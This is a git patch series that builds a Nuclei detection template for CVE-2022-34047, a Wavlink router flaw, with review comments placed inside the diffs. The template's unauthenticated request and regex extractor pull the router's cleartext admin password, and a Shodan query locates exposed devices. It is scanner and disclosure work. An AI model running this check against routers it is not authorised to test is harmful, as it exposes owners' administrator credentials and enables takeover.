From 46cf248bd05ab47f0a9ccb9c7e6d996eca160ef0 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com>
Date: Thu, 21 Jul 2022 03:39:27 +0800
Subject: [PATCH 1/3] Create CVE-2022-34047.yaml
---
 cves/2022/CVE-2022-34047.yaml | 37 +++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 cves/2022/CVE-2022-34047.yaml
diff --git a/cves/2022/CVE-2022-34047.yaml b/cves/2022/CVE-2022-34047.yaml
new file mode 100644
index 0000000000..5c9cb63583
--- /dev/null
+++ b/cves/2022/CVE-2022-34047.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-34047
+
+info:
+ name: Wavlink Password Leak
+ author: For3stCo1d
+ severity: high
+ description: |
+ An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd].
+ reference:
+ - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
+ metadata:
+ shodan-query: http.title:"Wi-Fi APP Login"
+ tags: cve,cve2022,wavlink,router,leak
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/set_safety.shtml?r=52300'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "var syspasswd"
+ - 'APP</title'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ regex:
+ - 'syspasswd="(.+?)"'
From a222f0af88563a18c24918ec6c0aa9535410d16f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com>
Date: Thu, 21 Jul 2022 03:54:47 +0800
Subject: [PATCH 2/3] Update CVE-2022-34047.yaml
---
 cves/2022/CVE-2022-34047.yaml | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)
diff --git a/cves/2022/CVE-2022-34047.yaml b/cves/2022/CVE-2022-34047.yaml
index 5c9cb63583..7096a91c98 100644
--- a/cves/2022/CVE-2022-34047.yaml
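Review bot: The `extractors` block that closes the template in patch 1/3 (`- 'syspasswd="(.+?)"'`), which neither follow-up patch touches, writes the router's cleartext admin password into every result, so the secret is copied into scan reports, CI logs and any tracker the findings are exported to. The word and status matchers already establish the exposure, so I would drop the extractor and let the finding carry only the matched URL; whoever remediates can read the value from the device itself. Separately, `info` has no `classification` block; adding one with `cve-id: CVE-2022-34047` lets consumers filter and deduplicate by CVE without parsing `tags`.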
+++ b/cves/2022/CVE-2022-34047.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-34047
 info:
- name: Wavlink Password Leak
+ name: Wavlink Set_safety.shtml Password Leak
 author: For3stCo1d
 severity: high
 description: |
@@ -14,9 +14,10 @@ info:
 tags: cve,cve2022,wavlink,router,leak
 requests:
- - method: GET
- path:
- - '{{BaseURL}}/set_safety.shtml?r=52300'
+ - raw:
+ - |
+ GET /set_safety.shtml?r=52300 HTTP/1.1
+ Host: {{Hostname}}
 matchers-condition: and
 matchers:
@@ -24,7 +25,7 @@ requests:
 part: body
 words:
 - "var syspasswd"
- - '<title>APP</title'
+ - '<title>APP'
 condition: and
 - type: status
From b2cdaa30b119794b914dc4abf4ad1386723231b2 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Thu, 21 Jul 2022 13:33:57 +0530
Subject: [PATCH 3/3] Update CVE-2022-34047.yaml
---
 cves/2022/CVE-2022-34047.yaml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/cves/2022/CVE-2022-34047.yaml b/cves/2022/CVE-2022-34047.yaml
index 7096a91c98..6f57a4eb82 100644
--- a/cves/2022/CVE-2022-34047.yaml
+++ b/cves/2022/CVE-2022-34047.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-34047
 info:
- name: Wavlink Set_safety.shtml Password Leak
+ name: Wavlink Set_safety.shtml - Password Exposure
 author: For3stCo1d
 severity: high
 description: |
@@ -10,8 +10,9 @@ info:
 - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
 metadata:
+ verified: true
 shodan-query: http.title:"Wi-Fi APP Login"
- tags: cve,cve2022,wavlink,router,leak
+ tags: cve,cve2022,wavlink,router,exposure
 requests:
 - raw:
@@ -24,7 +25,7 @@ requests:
 - type: word
 part: body
 words:
- "var syspasswd"
+ - 'var syspasswd="'
 - 'APP'
 condition: and
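Review bot: In the last hunk of patch 3/3 the tightened word `'var syspasswd="'` still matches a page that emits `var syspasswd=""`, so a device returning the variable with an empty value would be reported as a high-severity password exposure. Whether the firmware can produce that is not visible from the patch, but a matcher that requires a non-empty value avoids the false positive: use `type: regex` with `- 'var syspasswd="[^"]+"'` in place of the plain word. The `matchers` list starts and continues outside this hunk, so the status matcher and `matchers-condition: and` are assumed unchanged.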